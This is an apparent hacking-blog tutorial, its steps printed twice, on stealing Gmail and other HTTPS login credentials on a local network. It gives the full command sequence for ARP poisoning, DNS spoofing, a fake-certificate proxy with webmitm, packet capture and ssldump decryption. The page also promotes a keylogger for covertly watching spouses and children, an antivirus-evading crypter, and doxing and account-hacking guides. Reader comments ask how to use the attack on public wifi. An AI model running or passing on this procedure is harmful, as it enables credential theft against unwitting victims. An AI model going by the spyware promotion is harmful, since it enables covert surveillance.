Today in this article I will be showing you how to HACK Gmail credentials and gaining information such as passwords,user ids etc or any other SSL(secured socket layer) site's credentials in a network, using MITM(man in the middle ) attack with Backtrack 5.
Concept :-
It is nothing but an attacker who sits in between the two user in an network. Normally the two person will be the user and the router(gateway) in an network. The attacker will try to do few trick and replace the roll of router and he sits in his position. This is done by doing DNS spoofing, ARP poisoning, IP spoofing and few more other method. In this attack the user will not come to know that, his traffic is been forwarded through the attacker in the network. The attacker can simply gather information about the user and use it later or attacker can try to do active attack to the user.
You might be interested in some of our other articles:
Tools:
All these tools are installed in backtrack 5..
Step 1: First we need to setup ip forwarding using fragrouter. open a shell and type the command...
Code:
fragrouter -B1
This is to forward packets between the slave and its gateway while spoofing .... minimize the shell..
Step 2: Now we need to arp spoof the slave , open a new shell and type the command.
Code:
arpspoof -t [target ip] [default gateway ip]
example :
arpspoof -t 192.168.1.7 192.168.1.1
then minimize the shell .... now we have begin to arpspoof the slave...
Step 3: then for dns spoofing open a new shell and type
Code:
dnsspoof
then minimize the shell.... now all the DNS request from the slave will be redirected to us..
Step 4: To give proxy for these DNS requests ,we have to start up Webmitm open a new shell and type.
Code:
webmitm -d
if you were starting Webmitm for the first time it will ask you some details to create fake SSL certificate and private key ... just fill something in it...if you fill everything,then it will say " webmitm relaying transparently "
ok its done, minimize the shell..
Step 5: Now we need to capture the traffic using wireshark
Code:
applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark
Step 6: In wireshark select
Code:
capture -> interfaces -> start (cick start button near eth0 )
that's it
since the Dns has been spoofed, we can see the nslookup for gmail in slave computer shows attacker's ip :
In our case slave opens "gmail.com" in browser .He will be redirected to webmitm , which will issue the 'gmail page' with fake ssl certificate ,then our slave well log into "gmail" using his credentials... now all the traffic will be captured by wireshark ...then just stop the wireshark and save the captured traffic to root folder ... for example, i will save it as "test"..
In the root folder there will be another file called "webmitm.crt"..it is the fake ssl certificate generated by webmitm...
Now we have captured ssl packets and our own fake ssl certificate..
now to decrypt the captured packets...
open another new shell and type :
Code:
ssldump -r test -k webmitm.crt -d > finaloutput
were,
test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file
now open a shell and type :
Code:
cat finaloutput | grep Email
it will show you the decrypted username and password .
So friends, I hope you have enjoyed reading the aricle.if you have any doubts, please mention it in comments.
Enjoy HaCkInG...
Concept :-
It is nothing but an attacker who sits in between the two user in an network. Normally the two person will be the user and the router(gateway) in an network. The attacker will try to do few trick and replace the roll of router and he sits in his position. This is done by doing DNS spoofing, ARP poisoning, IP spoofing and few more other method. In this attack the user will not come to know that, his traffic is been forwarded through the attacker in the network. The attacker can simply gather information about the user and use it later or attacker can try to do active attack to the user.
You might be interested in some of our other articles:
- Download Free 100% FUD Crypter To Bypass Antivirus Detection
- Doxing Tutorial : Hack Hotmail and Facebook Account Password
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
Hacking Passwords Using MITM (Man In The Middle) Attack
Definitons :- SSL : Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption . With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker tries to sniff traffic between them will only get encrypted garbage values... the web servers which use SSL are denoted by HTTPS ...
- ARP : Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address( MAC address ). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.
- DNS : Domain Name System is a database system that translates a domain name into an IP address. for example if you type gmail.com in your browser , your DNS will reply with gmail's ip so that,your router can connect to gmail's server using its IP....for better understanding type -->" nslookup " in your cmd or konsole and then type "gmail.com" ,you will see your DNS replies you with gmail's ip addresses .
- ARP Spoofing : ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies , causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.
- DNS Spoofing : DNS spoofing is similar to arp spoofing ,it is based on the presentation of false or fake DNS information to the slave in a response to their DNS request and as a result forcing them to visit a site which is not the real one.
- MITM : Man in the middle attack means intercepting a communication between two systems ,both ARP Spoofing and DNS Spoofing are types of MITM attack..
- IP Forwarding : IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.
Tools:
- Fragrouter - tool used to for ip forwarding between slave and its destination host.
- Arpspoof - to arp spoof slave machine and its host
- Dnsspoof - to dns spoof slave machine and its host
- Webmitm - its a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions...
- Wireshark - it is a network protocol analyzer . here its used to capture ssl encrypted traffic between slave and webmitm...
- Ssldump - decrypts ssl packets using private key
All these tools are installed in backtrack 5..
Step 1: First we need to setup ip forwarding using fragrouter. open a shell and type the command...
Code:
fragrouter -B1
This is to forward packets between the slave and its gateway while spoofing .... minimize the shell..
Step 2: Now we need to arp spoof the slave , open a new shell and type the command.
Code:
arpspoof -t [target ip] [default gateway ip]
example :
arpspoof -t 192.168.1.7 192.168.1.1
then minimize the shell .... now we have begin to arpspoof the slave...
Step 3: then for dns spoofing open a new shell and type
Code:
dnsspoof
then minimize the shell.... now all the DNS request from the slave will be redirected to us..
Step 4: To give proxy for these DNS requests ,we have to start up Webmitm open a new shell and type.
Code:
webmitm -d
if you were starting Webmitm for the first time it will ask you some details to create fake SSL certificate and private key ... just fill something in it...if you fill everything,then it will say " webmitm relaying transparently "
ok its done, minimize the shell..
Step 5: Now we need to capture the traffic using wireshark
Code:
applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark
Step 6: In wireshark select
Code:
capture -> interfaces -> start (cick start button near eth0 )
that's it
since the Dns has been spoofed, we can see the nslookup for gmail in slave computer shows attacker's ip :
In our case slave opens "gmail.com" in browser .He will be redirected to webmitm , which will issue the 'gmail page' with fake ssl certificate ,then our slave well log into "gmail" using his credentials... now all the traffic will be captured by wireshark ...then just stop the wireshark and save the captured traffic to root folder ... for example, i will save it as "test"..
In the root folder there will be another file called "webmitm.crt"..it is the fake ssl certificate generated by webmitm...
Now we have captured ssl packets and our own fake ssl certificate..
now to decrypt the captured packets...
open another new shell and type :
Code:
ssldump -r test -k webmitm.crt -d > finaloutput
were,
test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file
now open a shell and type :
Code:
cat finaloutput | grep Email
it will show you the decrypted username and password .
So friends, I hope you have enjoyed reading the aricle.if you have any doubts, please mention it in comments.
Enjoy HaCkInG...
Filed Under: hack facebook , hack hotmail , hack twitter , HACKING SOFTWARES
If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates.
Subscribe Now!
Do you need to know what your child is doing on the computer? Do you want to know what your loved ones or spouse or kids are doing on the computer? Do you need to monitor what your employees are doing during work hours? Are they working or playing?
Winspy Keylogger
is intended to help you in these kind of situations. It can show you exactly what is being done on the computer at any time.
Click Here To Download Winspy Keylogger
Logging you in...
naveen hacker · 697 weeks ago
can i usee it for public wifi access?
Admin 86p · 696 weeks ago
dinolink · 685 weeks ago
Im in some problem first where to download the softwares...
second_ what is backtrack 5? is any linux? like ubuntu....? ....
Im waiting for the answers thx!!!
Admin 86p · 679 weeks ago
Juan Hernandez · 683 weeks ago
Admin 86p · 679 weeks ago
Scott Thomas · 656 weeks ago
Its a very good tutorial but I have a query regarding this tutorial. First of all let me explain my scenario. My gateway is a broadband internet device say at 192.168.1.1 supporting both LAN and WIFI (WAP2- AES 256-bit encryption). Victim is connected to gateway via WIFI and attacker is connected through LAN.
Query 1 : Does this attack workable in this scenario or the victim should must also be on LAN ?
Query 2 : My knowledge about SSL is that all SSL encrypted communication is done via session key. You are decrypting the captured traffic from from the server's private key but still you are getting gmail user name and password. Kindly identify the step in SSL communication where this attack takes place ?
Query 3 : Kindly also explain your network scenario on which you launched the attack plus also mention the web browsers and their version numbers on which you tested this tutorial ?
Regards
Scott Thomas
Simon · 643 weeks ago
blacky · 651 weeks ago
"ssldump -r test -k webmitm.crt -d > finaloutput"
when i typed the code above the shell replayed :
"PCAP: bad dump file format
ERROR: Aborting"
please help. thank you
DJ425 · 638 weeks ago
The issue that I'm having is the "finaloutput" file from ssldump is empty. I'm testing this on my own network, using Windows 7 w/ Firefox on my target computer. I've repeatedly logged in and out of gmail to ensure the credentials are being sent, but the ssldump file is still empty. I'm curious if there's a guide somewhere on how to identify / decrypt the packets captured in wireshark. The majority of what I've seen doesn't quite do what I need it to, that or I'm too much of a Noob to apply it to what I'm doing.
Thanks!
DJ
santosh · 563 weeks ago
Arch · 636 weeks ago
Admin 86p · 636 weeks ago
JohnLuu · 630 weeks ago
clіck here · 538 weeks ago
rusheessay · 526 weeks ago